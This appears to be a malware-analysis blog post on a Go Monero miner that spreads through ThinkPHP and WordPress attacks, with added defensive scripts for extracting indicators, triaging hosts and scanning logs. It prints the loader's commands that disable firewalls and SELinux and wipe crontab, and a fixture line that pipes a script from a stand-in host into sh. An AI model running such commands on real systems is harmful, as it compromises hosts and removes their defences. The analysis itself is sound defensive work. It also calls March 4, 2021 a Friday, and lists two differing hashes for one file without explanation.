Another Golang Crypto Miner on the Loose
There are many crypto mining malware variants infecting systems on the internet. On Friday, March 4, 2021, I noticed an interesting hit in my honeypot logs. The binary it captured stood out, as it was rather large at 4MB. I immediately thought it would be a crypto miner written in the Go language. I was correct. This one, however, uses some newer exploits to spread.
The malware attempted to exploit the ThinkPHP vulnerability in order to download and execute a script named ldr.sh. The loader script downloads the sysrvv binary and kills off competing crypto miners. It also installs a crontab entry that re-downloads and runs the loader every 30 minutes, trying wget, curl, and a PHP script in turn rather than relying on a single download method that might fail if that utility is not installed.
The sysrvv binary is UPX packed: it has been compressed with the Ultimate Packer for Executables, which leaves it runnable but hides most of its strings until it is unpacked. The file output after unpacking, and the SHA-256 hashes recorded for the sample:
$ file sysrvv
sysrvv: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
$ sha256sum sysrvv
47183b14ed24978643de4697abe917847831b1560256ddd76e44e918a6181fd8  sysrvv
$ sha256sum sysrvv
d3196b0b4767e86bf7e9e47722a5f733129c16f81f0ccbe5f822bdcfd778ca16  sysrvv
The sample has recently been uploaded to VirusTotal.
We can extract details of the mining pool with the strings command, a command-line tool that prints the readable strings in a binary. The pool and wallet are useful for tracking other malware paying into the same pool, and therefore probably run by the same actor. The algo value rx/0 is RandomX, the Monero proof-of-work, so we also know they are mining Monero. The block matches XMRig's pool configuration schema, embedded in the binary; the trailing %s on the user field appears to be a format placeholder that the binary fills in at run time, so the wallet address is everything before it:
"pools": [
    {
        "algo": "rx/0",
        "coin": null,
        "url": "xmr-eu1.nanopool.org:14444",
        "user": "49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxPZfGjNEChXttwWE3WGURa%s",
        "pass": "x",
        "rig-id": null,
        "nicehash": false,
        "keepalive": true,
        "enabled": true,
        "tls": false,
        "tls-fingerprint": null,
        "daemon": false,
        "socks5": null,
        "self-select": null
    },
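Pulling the pool details out of strings output by hand works for one sample, but if you want to pivot across many binaries paying into the same wallet it is worth scripting. The following is an added example, not code from the post or from the malware: it locates the "pools" array in raw strings output, strips the Go format verb so the fragment parses as JSON, and reports the pool, algorithm and wallet. The strings text it runs on is constructed here; only the pool block is the one shown above, and the Monero address check (95 base58 characters beginning with 4) is a general fact about standard Monero addresses, not something the sample tells us.

```python
import json
import re

# Constructed stand-in for `strings sysrvv` output. The pool block is the one
# shown in the post; the lines around it are filler, not strings from the sample.
SAMPLE_STRINGS = '''\
runtime.gopanic
"pools": [
    {
        "algo": "rx/0",
        "coin": null,
        "url": "xmr-eu1.nanopool.org:14444",
        "user": "49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxPZfGjNEChXttwWE3WGURa%s",
        "pass": "x",
        "rig-id": null,
        "nicehash": false,
        "keepalive": true,
        "enabled": true,
        "tls": false,
        "tls-fingerprint": null,
        "daemon": false,
        "socks5": null,
        "self-select": null
    }
],
curl_brute_wordpress
'''

GO_VERB = re.compile(r"%[-+# 0-9.]*[a-zA-Z]")          # %s, %d, %v ... left for fmt.Sprintf
MONERO_STD = re.compile(r"4[1-9A-HJ-NP-Za-km-z]{94}")   # standard address: 95 base58 chars, leading 4


def extract_pools(strings_output):
    """Find the XMRig-style "pools" array in raw strings output and return one
    dict per pool with the fields worth pivoting on. Returns [] if absent."""
    start = strings_output.find('"pools"')
    if start < 0:
        return []
    lb = strings_output.index("[", start)
    depth, end = 0, None
    for i in range(lb, len(strings_output)):     # naive bracket matching is enough here
        if strings_output[i] == "[":
            depth += 1
        elif strings_output[i] == "]":
            depth -= 1
            if depth == 0:
                end = i
                break
    if end is None:
        return []
    fragment = strings_output[lb:end + 1]
    raw = GO_VERB.sub("", fragment)              # drop the run-time placeholder so json.loads accepts it
    pools = []
    for p in json.loads(raw):
        user = p.get("user", "")
        pools.append({
            "url": p.get("url"),
            "algo": p.get("algo"),
            "tls": bool(p.get("tls")),
            "wallet": user,
            "monero_address": bool(MONERO_STD.fullmatch(user)),
            # True when the binary appends a worker name to the wallet at run time
            "worker_suffix_at_runtime": GO_VERB.search(fragment) is not None,
        })
    return pools


if __name__ == "__main__":
    for pool in extract_pools(SAMPLE_STRINGS):
        print(pool)
```

Run it against the real `strings` output of an unpacked sample; the wallet string is the value to search for in other samples or in a malware repository to link them to the same actor.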
The loader kills off competing crypto miners by removing their persistence, and weakens the host by disabling SELinux and flushing iptables (and ufw). It also removes any other miners it finds, including ones running as Docker containers or images. The root branch of the script, as recovered:
if [ $(id -u) == 0 ]; then
chattr -i /etc/ld.so.preload
ufw disable
iptables -F
service iptables stop
sysctl kernel.nmi_watchdog=0
echo 0 >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
setenforce 0
echo SELINUX=disabled > /etc/selinux/config
sysctl -w vm.nr_hugepages=$(nproc --all)
chattr -R -ia /var/spool/cron
chattr -ia /etc/crontab
chattr -R -ia /var/spool/cron/crontabs
chattr -R -ia /etc/cron.d
chattr -iua /tmp/
chattr -iua /var/tmp/
killall log_rot
ps aux | grep -v grep | egrep '2t3ik|qW3xT.2|ddg|./oka|postgres: .. . .
/etc/ld.so.preload /etc/rc.d/init.d/kthrotlds /tmp/kthrotlds /usr/sbin/watchdogs /dev/shm/z3.sh /dev/shm/z2.sh /dev/shm/.scr /dev/shm/.kerberods /usr/bin/config.json /usr/bin/exin /usr/local/lib/libioset.so /etc/cron.d/tomcat /etc/rc.d/init.d/watchdogs
docker ps | egrep 'pocosow|gakeaws|azulu|auto|xmr|mine|monero|slowhttp|bash.shell|entrypoint.sh|/var/sbin/bash' | awk '{print $1}' | xargs -I % docker kill %
docker images -a | grep 'pocosow|gakeaws|buster-slim|hello-|azulu|registry|xmr|auto|mine|monero|slowhttp' | awk '{print $3}' | xargs -I % docker rmi -f %
netstat -anp | egrep ':143|:2222|:3333|:3389|:4444|:5555|:6666|:6665|:6667|:7777|:8444|:3347|:14433' | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
crontab -r
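Every line of that root branch leaves a footprint a responder can check for. The following is an added example, not the post's or the malware's code: a small triage function that looks for the persistent side effects of the script above (SELINUX=disabled, kernel.nmi_watchdog=0 in sysctl.conf and in /proc, huge pages turned on, a populated /etc/ld.so.preload, and a 30-minute cron job that calls wget, curl, php or ldr.sh). The root directory is a parameter so it runs against a live host, a mounted image, or an extracted filesystem. The "*/30" cron schedule is an assumption drawn from the post's description of the reinfection interval, not a string recovered from the sample, and make_demo_root builds a constructed fixture so the function can be tried offline.

```python
import os
import re
import tempfile


def _read(path):
    """Return file text, or None if the path is absent, a directory, or unreadable."""
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return None


def triage_host(root="/"):
    """Look for the persistent side effects of the ldr.sh root branch under root.

    Returns a list of (indicator, detail) tuples. An empty list means none of
    these artifacts were found, not that the host is clean.
    """
    p = lambda rel: os.path.join(root, rel.lstrip("/"))
    findings = []

    # setenforce 0 is volatile; the config edit survives a reboot.
    sel = _read(p("/etc/selinux/config"))
    if sel and re.search(r"^\s*SELINUX=disabled\b", sel, re.M):
        findings.append(("selinux_disabled", "SELINUX=disabled in /etc/selinux/config"))

    # The loader both writes the sysctl live and appends it to sysctl.conf.
    nmi = _read(p("/proc/sys/kernel/nmi_watchdog"))
    if nmi is not None and nmi.strip() == "0":
        findings.append(("nmi_watchdog_off", "kernel.nmi_watchdog is currently 0"))
    conf = _read(p("/etc/sysctl.conf"))
    if conf and re.search(r"^\s*kernel\.nmi_watchdog\s*=\s*0\b", conf, re.M):
        findings.append(("nmi_watchdog_persisted", "kernel.nmi_watchdog=0 in /etc/sysctl.conf"))

    # vm.nr_hugepages=$(nproc --all) is set to speed up the RandomX miner.
    hp = _read(p("/proc/sys/vm/nr_hugepages"))
    if hp and hp.strip().isdigit() and int(hp) > 0:
        findings.append(("hugepages_enabled", f"vm.nr_hugepages={hp.strip()}"))

    # A non-empty ld.so.preload is rare on a stock host; it is the first file
    # the loader makes writable.
    preload = _read(p("/etc/ld.so.preload"))
    if preload and preload.strip():
        findings.append(("ld_so_preload", preload.strip()))

    # Cron reinfection every 30 minutes via wget, curl or php ("*/30" is assumed).
    cron_cmd = re.compile(r"wget|curl|php|ldr\.sh")
    for rel in ("/etc/crontab", "/etc/cron.d", "/var/spool/cron", "/var/spool/cron/crontabs"):
        path = p(rel)
        if os.path.isdir(path):
            files = [os.path.join(path, n) for n in os.listdir(path)]
        elif os.path.isfile(path):
            files = [path]
        else:
            continue
        for f in files:
            for line in (_read(f) or "").splitlines():
                s = line.strip()
                if s.startswith("*/30") and cron_cmd.search(s):
                    findings.append(("cron_reinfection", "/" + os.path.relpath(f, root) + ": " + s))
    return findings


def make_demo_root(infected=True):
    """Build a throwaway fake root (a constructed fixture, not a real host) so
    triage_host can be exercised offline. File names and the URL are made up."""
    root = tempfile.mkdtemp(prefix="sysrvv-triage-")
    for d in ("etc/selinux", "etc/cron.d"):
        os.makedirs(os.path.join(root, d))
    with open(os.path.join(root, "etc/selinux/config"), "w") as fh:
        fh.write("SELINUX=disabled\n" if infected else "SELINUX=enforcing\n")
    if infected:
        with open(os.path.join(root, "etc/sysctl.conf"), "w") as fh:
            fh.write("net.ipv4.ip_forward=0\nkernel.nmi_watchdog=0\n")
        with open(os.path.join(root, "etc/cron.d/apache"), "w") as fh:
            fh.write("*/30 * * * * root (curl -fsSL http://203.0.113.10/ldr.sh "
                     "|| wget -q -O- http://203.0.113.10/ldr.sh) | sh\n")
    return root


if __name__ == "__main__":
    for indicator, detail in triage_host(make_demo_root()):
        print(f"{indicator:24} {detail}")
```

Run triage_host("/") as root on a suspect box, or point it at the mount point of a disk image. The chattr changes are not covered here: lsattr on /etc/crontab, /etc/cron.d and /var/spool/cron is the quick manual check for those.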
Redress is a tool for analyzing stripped Go binaries; it recovers package and function names from the Go runtime metadata even when the symbol table has been stripped. Based on its output we can catalogue the vulnerabilities being used to spread this malware.
Table of exploits
The following functions are used to attempt a brute force login against WordPress, based on a list of credentials stored in the malware binary. If access is gained, the malware attempts to upload a plugin or edit a writable theme to get code execution:
wordpress.(*wpExec).login
wordpress.(*wpExec).exploitUploadPlugin
wordpress.(*wpExec).exploitWritableTheme
wordpress.BruteXmlrpc
wordpress.pwdByUsr
Function to brute force login
A sample of strings from these functions in the binary shows the list of credentials and a curl command with the user-agent set to curl_brute_wordpress.
What is interesting is that the malware appears to set the user-agent request header to the exploit name it's attempting. This could be a good way to determine if your system has been attacked or compromised by this particular piece of malware.
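That makes the web server access log the cheapest place to look. The following is an added example, not code from the post: it parses Apache/nginx combined-format log lines, flags any request whose User-Agent carries a marker this sample sends (curl_brute_wordpress is the one named above; anything else recovered from the binary would be added to the set), and counts hits per source address. The log lines are constructed for the demo using TEST-NET addresses. The "possible success" flag relies on a general WordPress behaviour rather than anything in the sample: a failed POST to wp-login.php re-renders the form with a 200, while a successful one redirects into wp-admin with a 302, so a 302 from a brute-forcing client deserves a closer look.

```python
import re
from collections import Counter

# User-Agent markers this sample was seen to send; extend from the binary's strings.
SYSRVV_USER_AGENTS = {"curl_brute_wordpress"}

# Apache/nginx "combined" log format.
COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (TEST-NET addresses), not taken from a real log.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Mar/2021:10:15:01 +0000] "POST /wp-login.php HTTP/1.1" 200 1532 "-" "curl_brute_wordpress"',
    '203.0.113.5 - - [04/Mar/2021:10:15:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 431 "-" "curl_brute_wordpress"',
    '198.51.100.7 - - [04/Mar/2021:10:15:03 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [04/Mar/2021:10:15:04 +0000] "GET /wp-login.php HTTP/1.1" 200 1532 "-" "curl/7.68.0"',
    '203.0.113.5 - - [04/Mar/2021:10:15:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "curl_brute_wordpress"',
]


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_LOG.match(line.strip())
    return m.groupdict() if m else None


def scan_access_log(lines, suspicious_uas=SYSRVV_USER_AGENTS):
    """Return (hits, per_source): hits is one dict per request whose User-Agent
    contains a known marker; per_source counts those hits per client IP."""
    hits = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None or not any(marker in rec["ua"] for marker in suspicious_uas):
            continue
        parts = rec["request"].split(" ")
        path = parts[1] if len(parts) > 1 else rec["request"]
        # WordPress heuristic: 200 on a wp-login.php POST is a failed login,
        # 302 means the credentials worked. Confirm by hand before acting on it.
        possible_success = path.endswith("/wp-login.php") and rec["status"] == "302"
        hits.append({
            "line": n, "ip": rec["ip"], "time": rec["ts"], "path": path,
            "status": rec["status"], "ua": rec["ua"],
            "possible_success": possible_success,
        })
    return hits, Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    hits, per_source = scan_access_log(SAMPLE_LOG)
    for h in hits:
        flag = "  <-- possible success" if h["possible_success"] else ""
        print(f'{h["time"]} {h["ip"]} {h["path"]} {h["status"]} {h["ua"]}{flag}')
    print(dict(per_source))
```

Feed it the real access log with `scan_access_log(open("/var/log/nginx/access.log"))`. Note that the plain substring match means "curl/7.68.0" does not trigger on the curl_brute_wordpress marker, and that an absence of hits only says this particular User-Agent was not seen; the loader's other exploits may not announce themselves the same way.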
There also appear to be functions for brute forcing JupyterLab notebook credentials, I suspect in an attempt to run arbitrary commands on poorly secured notebooks.
Conclusion
Crypto mining malware will continue to evolve and take advantage of the latest software vulnerabilities. Command injection and remote code execution bugs will stay valuable to criminals who want to monetize your CPU cycles. What we do know for sure is that they are updating their malware with the latest exploits, which may mean the older vulnerabilities are being patched or are becoming a less reliable way to compromise systems. As always, the best course of action is keeping system software updated and using strong passwords with multi-factor authentication.